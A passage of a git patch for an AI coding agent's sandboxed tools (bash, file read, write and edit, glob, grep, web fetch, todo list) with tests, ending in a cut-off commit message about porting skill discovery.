experimental_context: ctx, + } as never)) as { success: boolean; path: string; bytesWritten: number }; 
+ expect(result.success).toBe(true); + expect(result.path).toBe("src/index.ts"); + expect(result.bytesWritten).toBe(42); + expect(sb.mkdir).toHaveBeenCalledWith("/sandbox/mono/src", { recursive: true }); + expect(sb.writeFile).toHaveBeenCalledWith("/sandbox/mono/src/index.ts", "export {}", "utf-8"); + }); + + it("returns success:false on sandbox failure", async () => { + const sb = makeSandbox({ + writeFile: vi.fn().mockRejectedValue(new Error("EACCES")), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = writeFileTool; + const result = (await tool.execute!({ filePath: "a.ts", content: "x" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/EACCES/); + }); +}); diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts index 908113812..479a608db 100644 --- a/lib/agent/tools/bashTool.ts +++ b/lib/agent/tools/bashTool.ts @@ -21,9 +21,9 @@ const bashInputSchema = z.object({ }); /** - * Factory for the `bash` sandbox tool. Runs `bash -c ""` inside - * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's - * working directory. + * `bash` sandbox tool. Runs `bash -c ""` inside the agent's + * sandbox via `sandbox.exec`, defaulting cwd to the sandbox's working + * directory. * * Approval gating is intentionally absent — model-issued commands are * trusted in this PR. Add a host-side gate at the route/UI layer if that @@ -34,9 +34,8 @@ const bashInputSchema = z.object({ * the right org. Detached execs deliberately skip env injection — those * processes outlive the prompt. */ -export const bashTool = () => - tool({ - description: `Execute a bash command in the user's shell (non-interactive). +export const bashTool = tool({ + description: `Execute a bash command in the user's shell (non-interactive). 
WHEN TO USE: - Running existing project commands (build, test, lint, typecheck) @@ -61,56 +60,56 @@ IMPORTANT: - Never use interactive commands (vim, nano, top, bash, ssh, etc.) - Always quote file paths that may contain spaces - Use detached: true to start dev servers / long-running processes in the background`, - inputSchema: bashInputSchema, - execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { - const sandbox = await getSandbox(experimental_context, "bash"); - const workingDirectory = sandbox.workingDirectory; - const workingDir = cwd - ? path.isAbsolute(cwd) - ? cwd - : path.resolve(workingDirectory, cwd) - : workingDirectory; + inputSchema: bashInputSchema, + execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { + const sandbox = await getSandbox(experimental_context, "bash"); + const workingDirectory = sandbox.workingDirectory; + const workingDir = cwd + ? path.isAbsolute(cwd) + ? cwd + : path.resolve(workingDirectory, cwd) + : workingDirectory; - if (detached) { - if (!sandbox.execDetached) { - return { - success: false, - exitCode: null, - stdout: "", - stderr: - "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.", - }; - } - try { - const { commandId } = await sandbox.execDetached(command, workingDir); - return { - success: true, - exitCode: null, - stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, - stderr: "", - }; - } catch (error) { - return { - success: false, - exitCode: null, - stdout: "", - stderr: error instanceof Error ? error.message : String(error), - }; - } + if (detached) { + if (!sandbox.execDetached) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: + "Detached mode is not supported in this sandbox environment. 
Only cloud sandboxes support background processes.", + }; } + try { + const { commandId } = await sandbox.execDetached(command, workingDir); + return { + success: true, + exitCode: null, + stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, + stderr: "", + }; + } catch (error) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: error instanceof Error ? error.message : String(error), + }; + } + } - const recoupEnv = buildRecoupExecEnv(experimental_context); - const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { - signal: abortSignal, - ...(recoupEnv ? { env: recoupEnv } : {}), - }); + const recoupEnv = buildRecoupExecEnv(experimental_context); + const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? { env: recoupEnv } : {}), + }); - return { - success: result.success, - exitCode: result.exitCode, - stdout: result.stdout, - stderr: result.stderr, - ...(result.truncated && { truncated: true }), - }; - }, - }); + return { + success: result.success, + exitCode: result.exitCode, + stdout: result.stdout, + stderr: result.stderr, + ...(result.truncated && { truncated: true }), + }; + }, +}); diff --git a/lib/agent/tools/editFileTool.ts b/lib/agent/tools/editFileTool.ts new file mode 100644 index 000000000..d8274c0bc --- /dev/null +++ b/lib/agent/tools/editFileTool.ts @@ -0,0 +1,100 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const editInputSchema = z.object({ + filePath: z.string().describe("Workspace-relative path to the file to edit (e.g., src/auth.ts)"), + oldString: z.string().describe("The exact text to replace"), + newString: z.string().describe("The text to replace it with (must differ from oldString)"), + replaceAll: z.boolean().optional().describe("Replace all 
occurrences. Default: false"), + startLine: z + .number() + .optional() + .describe("Line number where oldString starts (for diff display)"), +}); + +/** + * `edit` — exact-string replacement inside a sandboxed file. Requires the + * model to have already read the file so it can produce a unique + * `oldString`. Rejects ambiguous matches unless `replaceAll` is set. + */ +export const editFileTool = tool({ + description: `Perform exact string replacement in a file. + +WHEN TO USE: +- Making small, precise edits to an existing file you have already read +- Renaming a variable or identifier consistently within a single file +- Changing a specific block of code or configuration exactly as seen in the read output + +WHEN NOT TO USE: +- Creating new files (use writeFileTool instead) +- Large structural rewrites where it's simpler to rewrite the entire file (use writeFileTool) + +USAGE: +- Use workspace-relative file paths (e.g., "src/auth.ts") +- You must read the file first with readFileTool in this conversation +- Provide oldString as the EXACT text to replace, including whitespace and indentation +- By default, oldString must be UNIQUE in the file; otherwise the edit will fail +- Use replaceAll: true to change ALL occurrences (e.g., for a rename) +- ALWAYS provide startLine when known: the line number where oldString begins + +IMPORTANT: +- Preserve exact indentation and spacing from the file's content as returned by readFileTool +- Never include line numbers or the "N: " line prefixes from the read output in oldString or newString +- If oldString appears multiple times and replaceAll is false, the tool FAILS with an error and occurrence count`, + inputSchema: editInputSchema, + execute: async ( + { filePath, oldString, newString, replaceAll = false }, + { experimental_context }, + ) => { + const sandbox = await getSandbox(experimental_context, "edit"); + const workingDirectory = sandbox.workingDirectory; + + try { + if (oldString === newString) { + return { success: 
false, error: "oldString and newString must be different" }; + } + + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + const content = await sandbox.readFile(absolutePath, "utf-8"); + + if (!content.includes(oldString)) { + return { + success: false, + error: "oldString not found in file", + hint: "Make sure to match exact whitespace and indentation", + }; + } + + const occurrences = content.split(oldString).length - 1; + if (occurrences > 1 && !replaceAll) { + return { + success: false, + error: `oldString found ${occurrences} times. Use replaceAll=true or provide more context to make it unique.`, + }; + } + + const matchIndex = content.indexOf(oldString); + const startLine = content.slice(0, matchIndex).split("\n").length; + const newContent = replaceAll + ? content.replaceAll(oldString, newString) + : content.replace(oldString, newString); + + await sandbox.writeFile(absolutePath, newContent, "utf-8"); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + replacements: replaceAll ? occurrences : 1, + startLine, + }; + } catch (error) { + const message = error instanceof Error ? 
error.message : String(error); + return { success: false, error: `Failed to edit file: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/globTool.ts b/lib/agent/tools/globTool.ts new file mode 100644 index 000000000..d1de234d2 --- /dev/null +++ b/lib/agent/tools/globTool.ts @@ -0,0 +1,165 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +interface FileInfo { + path: string; + size: number; + modifiedAt: number; +} + +const globInputSchema = z.object({ + pattern: z.string().describe("Glob pattern to match (e.g., '**/*.ts')"), + path: z + .string() + .optional() + .describe("Workspace-relative base directory to search from (e.g., src)"), + limit: z.number().optional().describe("Maximum number of results. Default: 100"), +}); + +const GLOB_TIMEOUT_MS = 30_000; +const DEFAULT_LIMIT = 100; + +/** + * `glob` — find files matching a glob pattern, sorted by mtime (newest + * first). Skips hidden files and `node_modules`. Uses `find -printf` on + * GNU find (Linux sandboxes), falling back to `xargs stat` on BSD find. + */ +export const globTool = tool({ + description: `Find files matching a glob pattern. 
+ +WHEN TO USE: +- Locating files by extension or naming pattern (e.g., all *.test.ts files) +- Discovering where components, migrations, or configs live +- Getting a quick list of recently modified files of a given type + +WHEN NOT TO USE: +- Searching inside file contents (use grepTool instead) +- Reading file contents (use readFileTool instead) + +USAGE: +- Supports patterns like "**/*.ts", "src/**/*.js", "*.json" +- Returns FILES (not directories) sorted by modification time (newest first) +- Skips hidden files (names starting with ".") and node_modules +- If path is omitted, the current working directory is used as the base +- Use workspace-relative paths when setting path +- Results are limited by the limit parameter (default: 100) + +IMPORTANT: +- Patterns are matched primarily on the final path segment (file name), with basic "*" and "**" support +- Use this to narrow down candidate files before calling readFileTool or grepTool`, + inputSchema: globInputSchema, + execute: async ( + { pattern, path: basePath, limit = DEFAULT_LIMIT }, + { experimental_context, abortSignal }, + ) => { + const sandbox = await getSandbox(experimental_context, "glob"); + const workingDirectory = sandbox.workingDirectory; + + try { + let searchDir: string; + if (basePath) { + searchDir = path.isAbsolute(basePath) ? basePath : path.resolve(workingDirectory, basePath); + } else { + searchDir = workingDirectory; + } + + // Extract file-name pattern (last segment) + literal directory prefix + // (segments before any wildcards) so we can constrain `find -maxdepth`. + const patternParts = pattern.split("/").filter(Boolean); + const namePattern = patternParts[patternParts.length - 1] ?? 
"*"; + const literalPrefix: string[] = []; + for (let i = 0; i < patternParts.length - 1; i++) { + const part = patternParts[i]!; + if (part.includes("*") || part.includes("?") || part.includes("[")) break; + literalPrefix.push(part); + } + if (literalPrefix.length > 0) { + searchDir = path.join(searchDir, ...literalPrefix); + } + + const remainingDirSegments = patternParts.slice( + literalPrefix.length, + patternParts.length - 1, + ); + const hasRecursiveWildcard = + remainingDirSegments.some(s => s === "**") || namePattern === "**"; + + let maxDepth: number | undefined; + if (!hasRecursiveWildcard) { + maxDepth = remainingDirSegments.length + 1; + } + + const findArgs: string[] = ["find", shellEscape(searchDir)]; + if (maxDepth !== undefined) findArgs.push("-maxdepth", String(maxDepth)); + findArgs.push( + "-not", + "-path", + "'*/.*'", + "-not", + "-path", + "'*/node_modules/*'", + "-type", + "f", + "-name", + shellEscape(namePattern), + ); + + // GNU `find -printf` (Linux) vs BSD `find` (macOS) compatibility. + const findBase = findArgs.join(" "); + const command = [ + `{ ${findBase} -printf '%T@\\t%s\\t%p\\n' 2>/dev/null`, + `|| ${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N' ; }`, + `| sort -t$'\\t' -k1 -rn | head -n ${limit}`, + ].join(" "); + + const result = await sandbox.exec(command, workingDirectory, GLOB_TIMEOUT_MS, { + signal: abortSignal, + }); + + // find may exit 1 on permission errors but still produce valid output. 
+ if (!result.success && result.exitCode !== 1) { + return { + success: false, + error: `Glob failed (exit ${result.exitCode}): ${result.stdout.slice(0, 500)}`, + }; + } + + const files: FileInfo[] = []; + const lines = result.stdout.split("\n").filter(Boolean); + for (const line of lines) { + const firstTab = line.indexOf("\t"); + if (firstTab === -1) continue; + const secondTab = line.indexOf("\t", firstTab + 1); + if (secondTab === -1) continue; + const mtimeSeconds = parseFloat(line.slice(0, firstTab)); + const size = parseInt(line.slice(firstTab + 1, secondTab), 10); + const filePath = line.slice(secondTab + 1); + if (isNaN(mtimeSeconds) || isNaN(size) || !filePath) continue; + files.push({ + path: toDisplayPath(filePath, workingDirectory), + size, + modifiedAt: mtimeSeconds * 1000, + }); + } + + return { + success: true, + pattern, + baseDir: toDisplayPath(searchDir, workingDirectory), + count: files.length, + files: files.map(f => ({ + path: f.path, + size: f.size, + modifiedAt: new Date(f.modifiedAt).toISOString(), + })), + }; + } catch (error) { + const message = error instanceof Error ? 
error.message : String(error); + return { success: false, error: `Glob failed: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/grepTool.ts b/lib/agent/tools/grepTool.ts new file mode 100644 index 000000000..f172f61af --- /dev/null +++ b/lib/agent/tools/grepTool.ts @@ -0,0 +1,143 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +interface GrepMatch { + file: string; + line: number; + content: string; +} + +const grepInputSchema = z.object({ + pattern: z.string().describe("Regex pattern to search for"), + path: z.string().describe("Workspace-relative file or directory to search in (e.g., src)"), + glob: z.string().optional().describe("Glob pattern to filter files (e.g., '*.ts')"), + caseSensitive: z.boolean().optional().describe("Case-sensitive search. Default: true"), +}); + +const GREP_TIMEOUT_MS = 30_000; +const MAX_TOTAL_MATCHES = 100; +const MAX_PER_FILE_MATCHES = 10; +const MAX_LINE_LENGTH = 200; + +/** + * `grep` — search for POSIX-ERE patterns across files in the sandbox via + * `grep -rn`. Caps results to 100 total / 10 per file / 200 chars per + * match line so long stdouts don't blow the model context. + */ +export const grepTool = tool({ + description: `Search for patterns in files using POSIX Extended Regular Expressions (ERE). 
+ +WHEN TO USE: +- Finding where a function, variable, or string literal is used +- Locating configuration keys, routes, or error messages across files +- Narrowing down which files to read or edit + +WHEN NOT TO USE: +- Simple filename-only searches (use globTool instead) +- Directory listings, builds, or other shell tasks (use bashTool instead) + +USAGE: +- Uses POSIX ERE syntax (e.g., "log.*Error", "function[[:space:]]+[a-zA-Z_]+") +- Perl-style shorthands like \\s, \\w, \\d are NOT supported; use POSIX classes instead: [[:space:]], [[:alnum:]_], [[:digit:]] +- Search a specific file OR an entire directory via the path parameter +- Use workspace-relative paths for path (e.g., "src") +- Optionally filter files with glob (e.g., "*.ts", "*.test.js") +- Matches are SINGLE-LINE: patterns do not span across newline characters +- Results are limited to 100 matches total, with up to 10 matches per file; each match line is truncated to 200 characters + +IMPORTANT: +- ALWAYS use this tool for code/content searches instead of running grep/rg via bashTool +- Use caseSensitive: false for case-insensitive searches +- Hidden files and node_modules are skipped when searching directories`, + inputSchema: grepInputSchema, + execute: async ( + { pattern, path: searchPath, glob, caseSensitive = true }, + { experimental_context, abortSignal }, + ) => { + const sandbox = await getSandbox(experimental_context, "grep"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(searchPath) + ? 
searchPath + : path.resolve(workingDirectory, searchPath); + + const args: string[] = ["grep", "-rn"]; + if (!caseSensitive) args.push("-i"); + args.push( + `--exclude-dir=${shellEscape(".*")}`, + `--exclude-dir=${shellEscape("node_modules")}`, + ); + if (glob) args.push(`--include=${shellEscape(glob)}`); + args.push( + "-m", + String(MAX_PER_FILE_MATCHES), + "-E", + shellEscape(pattern), + shellEscape(absolutePath), + ); + const command = args.join(" "); + + const result = await sandbox.exec(command, workingDirectory, GREP_TIMEOUT_MS, { + signal: abortSignal, + }); + + // grep exits with 1 when no matches found — that's not an error. + if (!result.success && result.exitCode !== 1) { + const errorOutput = (result.stderr || result.stdout).slice(0, 500); + return { + success: false, + error: `Grep failed (exit ${result.exitCode}): ${errorOutput}`, + }; + } + + const matches: GrepMatch[] = []; + const filesSet = new Set(); + const fileMatchCounts = new Map(); + + const lines = result.stdout.split("\n").filter(Boolean); + for (const line of lines) { + if (matches.length >= MAX_TOTAL_MATCHES) break; + + // grep -rn output: file:line:content. Find the `:digits:` separator. + const match = line.match(/:(\d+):/); + if (!match || match.index === undefined) continue; + const file = line.slice(0, match.index); + const rest = line.slice(match.index + 1); + const colonIndex = rest.indexOf(":"); + if (colonIndex === -1) continue; + + const lineNum = parseInt(rest.slice(0, colonIndex), 10); + const content = rest.slice(colonIndex + 1); + if (isNaN(lineNum)) continue; + + const displayFile = toDisplayPath(file, workingDirectory); + filesSet.add(displayFile); + const currentFileCount = fileMatchCounts.get(displayFile) ?? 
0; + if (currentFileCount >= MAX_PER_FILE_MATCHES) continue; + + fileMatchCounts.set(displayFile, currentFileCount + 1); + matches.push({ + file: displayFile, + line: lineNum, + content: content.slice(0, MAX_LINE_LENGTH), + }); + } + + return { + success: true, + pattern, + matchCount: matches.length, + filesWithMatches: filesSet.size, + matches, + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Grep failed: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/readFileTool.ts b/lib/agent/tools/readFileTool.ts new file mode 100644 index 000000000..f5a486a64 --- /dev/null +++ b/lib/agent/tools/readFileTool.ts @@ -0,0 +1,70 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const readInputSchema = z.object({ + filePath: z.string().describe("Workspace-relative path to the file to read (e.g., src/index.ts)"), + offset: z.number().optional().describe("Line number to start reading from (1-indexed)"), + limit: z.number().optional().describe("Maximum number of lines to read. Default: 2000"), +}); + +/** + * `read` — read a file from the sandbox. Returns numbered lines in the + * format `N: ` so the model can refer to specific lines when + * later editing. + */ +export const readFileTool = tool({ + description: `Read a file from the filesystem. 
+ +USAGE: +- Use workspace-relative paths (e.g., "src/index.ts") +- Paths are resolved from the workspace root +- By default reads up to 2000 lines starting from line 1 +- Use offset and limit for long files (both are line-based, 1-indexed) +- Results include line numbers starting at 1 in "N: content" format + +IMPORTANT: +- Always read a file at least once before editing it with the edit/write tools +- This tool can only read files, not directories — attempting to read a directory returns an error +- You can call multiple reads in parallel to speculatively load several files`, + inputSchema: readInputSchema, + execute: async ({ filePath, offset = 1, limit = 2000 }, { experimental_context }) => { + const sandbox = await getSandbox(experimental_context, "read"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + + const stats = await sandbox.stat(absolutePath); + if (stats.isDirectory()) { + return { + success: false, + error: "Cannot read a directory. Use glob or ls command instead.", + }; + } + + const content = await sandbox.readFile(absolutePath, "utf-8"); + const lines = content.split("\n"); + const startLine = Math.max(1, offset) - 1; + const endLine = Math.min(lines.length, startLine + limit); + const selectedLines = lines.slice(startLine, endLine); + const numberedLines = selectedLines.map((line, i) => `${startLine + i + 1}: ${line}`); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + totalLines: lines.length, + startLine: startLine + 1, + endLine, + content: numberedLines.join("\n"), + }; + } catch (error) { + const message = error instanceof Error ? 
error.message : String(error); + return { success: false, error: `Failed to read file: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/shellEscape.ts b/lib/agent/tools/shellEscape.ts new file mode 100644 index 000000000..8ba4a71a3 --- /dev/null +++ b/lib/agent/tools/shellEscape.ts @@ -0,0 +1,14 @@ +/** + * Escape a string for safe use as a single-quoted shell argument. + * + * Wraps the string in single quotes and escapes any embedded single + * quotes via the standard `' → '\''` dance (close quote, escape literal + * quote, reopen quote). Everything else stays verbatim inside single + * quotes — shell metacharacters like `$`, `` ` ``, `&`, `*` are NOT + * expanded so the result is safe to pass to `bash -c` or `sh -c`. + * + * @param s - The string to escape. + */ +export function shellEscape(s: string): string { + return "'" + s.replace(/'/g, "'\\''") + "'"; +} diff --git a/lib/agent/tools/toDisplayPath.ts b/lib/agent/tools/toDisplayPath.ts new file mode 100644 index 000000000..827c391af --- /dev/null +++ b/lib/agent/tools/toDisplayPath.ts @@ -0,0 +1,34 @@ +import * as path from "path"; + +function isPathWithinDirectory(filePath: string, directory: string): boolean { + const resolvedPath = path.resolve(filePath); + const resolvedDir = path.resolve(directory); + return resolvedPath.startsWith(resolvedDir + path.sep) || resolvedPath === resolvedDir; +} + +/** + * Convert an absolute (or relative-to-workingDirectory) path into a compact + * model-friendly display path. + * + * Paths inside the working directory are returned relative (e.g. + * `src/index.ts`) to avoid repeating long absolute prefixes in tool output. + * Paths outside the working directory remain absolute for clarity and safety + * (e.g. `/etc/hosts`). All separators are normalized to `/`. + * + * @param filePath - Absolute or workspace-relative file path. + * @param workingDirectory - The sandbox's working directory (always absolute). 
+ */ +export function toDisplayPath(filePath: string, workingDirectory: string): string { + const absolutePath = path.isAbsolute(filePath) + ? path.resolve(filePath) + : path.resolve(workingDirectory, filePath); + + if (!isPathWithinDirectory(absolutePath, workingDirectory)) { + return absolutePath.replace(/\\/g, "/"); + } + + const relativePath = path.relative(workingDirectory, absolutePath); + if (relativePath === "") return "."; + + return relativePath.replace(/\\/g, "/"); +} diff --git a/lib/agent/tools/todoWriteTool.ts b/lib/agent/tools/todoWriteTool.ts new file mode 100644 index 000000000..d91e9147a --- /dev/null +++ b/lib/agent/tools/todoWriteTool.ts @@ -0,0 +1,65 @@ +import { tool } from "ai"; +import { z } from "zod"; + +export const todoStatusSchema = z.enum(["pending", "in_progress", "completed"]); +export type TodoStatus = z.infer; + +export const todoItemSchema = z.object({ + id: z.string().describe("Unique identifier for the todo item"), + content: z.string().describe("The task description"), + status: todoStatusSchema.describe( + "Current status. Only ONE task should be in_progress at a time.", + ), +}); +export type TodoItem = z.infer; + +/** + * `todo_write` — the agent's planning surface. Stateless on the server side + * (the tool simply echoes the list back to the chat UI so the user sees the + * current plan). The agent uses this to track multi-step work and signal + * intent between turns. + * + * Slot into `buildAgentTools` as `todo_write: todoWriteTool`. + */ +export const todoWriteTool = tool({ + description: `Create and manage a structured task list for the current session. 
+ +WHEN TO USE: +- Complex multi-step tasks requiring 3 or more distinct steps +- When the user provides multiple requirements or a checklist +- After receiving new instructions - immediately capture them as todos +- When starting work on a task - mark that todo as in_progress BEFORE beginning +- After completing a task - mark it as completed immediately + +WHEN NOT TO USE: +- A single, straightforward task that can be done in one step +- Trivial tasks requiring fewer than 3 minor steps +- Purely conversational or informational queries + +TASK STATES: +- "pending": Task not yet started +- "in_progress": Currently being worked on (ONLY ONE todo should be in this state at a time) +- "completed": Task finished successfully + +USAGE: +- This tool REPLACES the entire todo list - always send the full, updated list of todos +- Use it frequently to keep the task list in sync with your actual progress +- Update statuses as you start and finish work, rather than batching updates later + +IMPORTANT: +- Only one todo should be in_progress at a time; avoid parallel in_progress tasks +- Mark todos as completed as soon as they are done - do not wait to batch completions +- Use clear, concise todo content so the list remains readable to the user`, + inputSchema: z.object({ + todos: z + .array(todoItemSchema) + .describe("The complete list of todo items. 
/**
 * `web_fetch` — make an HTTP request from inside the sandbox via curl.
 * Lives in the sandbox (not on the worker) so requests come from the
 * sandbox's network egress, can reuse its env, and don't bypass any
 * sandbox-level policies. Response bodies are cut off by `head -c` after
 * `MAX_BODY_LENGTH` bytes to protect model context.
 *
 * Result shape:
 * - `{ success: true, status, body, truncated }` when curl exits 0 or 23;
 *   `status` is `null` if no numeric HTTP code could be parsed.
 * - `{ success: false, error }` for any other curl exit code or when the
 *   sandbox exec call throws.
 *
 * HEAD requests use curl's `--head` mode, so the "body" returned for HEAD is
 * the response header block curl writes to its output.
 */
export const webFetchTool = tool({
  description: `Fetch a URL from the web.

USAGE:
- Make HTTP requests to external URLs
- Supports GET, POST, PUT, PATCH, DELETE, and HEAD methods
- Returns the response status and body text
- Body is truncated to ${MAX_BODY_LENGTH} characters to avoid overwhelming context`,
  inputSchema: fetchInputSchema,
  outputSchema: fetchOutputSchema,
  execute: async (
    { url, method = "GET", headers, body },
    { experimental_context, abortSignal },
  ) => {
    const sandbox = await getSandbox(experimental_context, "web_fetch");
    const workingDirectory = sandbox.workingDirectory;
    const recoupEnv = buildRecoupExecEnv(experimental_context);

    // `-X` only rewrites the request verb; curl would still wait for a
    // response body that a HEAD response never carries. `--head` is the
    // documented way to issue a real HEAD request.
    const methodArgs = method === "HEAD" ? ["--head"] : ["-X", method];

    const args: string[] = [
      "curl",
      "-sS",
      ...methodArgs,
      "--max-time",
      String(Math.ceil(FETCH_TIMEOUT_MS / 1000)),
      "-o",
      // Intentionally NOT shell-escaped: bash must see this as a process
      // substitution so the body is piped through `head -c` onto fd 3.
      `>(head -c ${MAX_BODY_LENGTH} >&3)`,
      "-w",
      shellEscape("%{http_code}"),
    ];

    if (headers) {
      for (const [key, value] of Object.entries(headers)) {
        args.push("-H", shellEscape(`${key}: ${value}`));
      }
    }
    if (method !== "GET" && method !== "HEAD" && body) {
      // `--data-raw` sends the payload verbatim. Plain `-d` treats a leading
      // `@` as "read the payload from this file", which would silently
      // replace a body such as "@mention" with file contents (or fail).
      args.push("--data-raw", shellEscape(body));
    }
    args.push(shellEscape(url));

    // Use fd 3 to split curl's response body (truncated by `head -c`) from
    // the status code written via `-w`. The body goes to stdout via fd 3
    // → fd 1, then we append the status code on its own newline.
    const command = [
      "exec 3>&1",
      `status=$(${args.join(" ")})`,
      "curlExit=$?",
      "exec 3>&-",
      "printf '\\n%s' \"$status\"",
      "exit $curlExit",
    ].join("\n");

    try {
      const result = await sandbox.exec(command, workingDirectory, FETCH_TIMEOUT_MS, {
        signal: abortSignal,
        ...(recoupEnv ? { env: recoupEnv } : {}),
      });

      // exit 23 = curl wrote partial output (`head -c` cut it off — expected for large responses).
      if (result.exitCode !== 0 && result.exitCode !== 23) {
        return {
          success: false,
          error: `Fetch failed: ${result.stderr || result.stdout || "Unknown error"}`,
        };
      }

      // stdout is "<body>\n<status>": everything after the final newline is
      // the `-w` status code, everything before it is the (possibly cut) body.
      const output = result.stdout ?? "";
      const lastNewline = output.lastIndexOf("\n");
      const statusText = lastNewline !== -1 ? output.slice(lastNewline + 1).trim() : "";
      const responseBody = lastNewline !== -1 ? output.slice(0, lastNewline) : output;
      const status = /^\d+$/.test(statusText) ? parseInt(statusText, 10) : null;

      return {
        success: true,
        status,
        body: responseBody,
        truncated: result.exitCode === 23,
      };
    } catch (error) {
      const message = error instanceof Error ? error.message : String(error);
      return { success: false, error: `Fetch failed: ${message}` };
    }
  },
});
+ +WHEN TO USE: +- Creating a new file that does not yet exist +- Completely replacing the contents of an existing file after you've read it + +WHEN NOT TO USE: +- Small or localized changes to an existing file (prefer editFileTool) +- Reading files (use readFileTool instead) +- Searching (use grepTool or globTool instead) + +USAGE: +- Use workspace-relative paths (e.g., "src/user.test.ts") +- This will OVERWRITE existing files entirely +- Parent directories are created automatically if they do not exist + +IMPORTANT: +- ALWAYS read an existing file with readFileTool before overwriting it +- Prefer editing existing files over creating new ones unless a new file is explicitly needed +- NEVER proactively create documentation files (e.g., *.md) unless the user explicitly requests them +- Do not write files that contain secrets or credentials (API keys, passwords, .env, etc.)`, + inputSchema: writeInputSchema, + execute: async ({ filePath, content }, { experimental_context }) => { + const sandbox = await getSandbox(experimental_context, "write"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + const dir = path.dirname(absolutePath); + await sandbox.mkdir(dir, { recursive: true }); + await sandbox.writeFile(absolutePath, content, "utf-8"); + const stats = await sandbox.stat(absolutePath); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + bytesWritten: stats.size, + }; + } catch (error) { + const message = error instanceof Error ? 
error.message : String(error); + return { success: false, error: `Failed to write file: ${message}` }; + } + }, +}); From 5e1a386463c7f25fd733d1711c2a28a0afc1b8a1 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 14:47:56 -0500 Subject: [PATCH 5/5] feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project- level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — $ARGUMENTS replacement - injectSkillDirectory.ts — prepend `Skill directory: ` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model. 
Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - 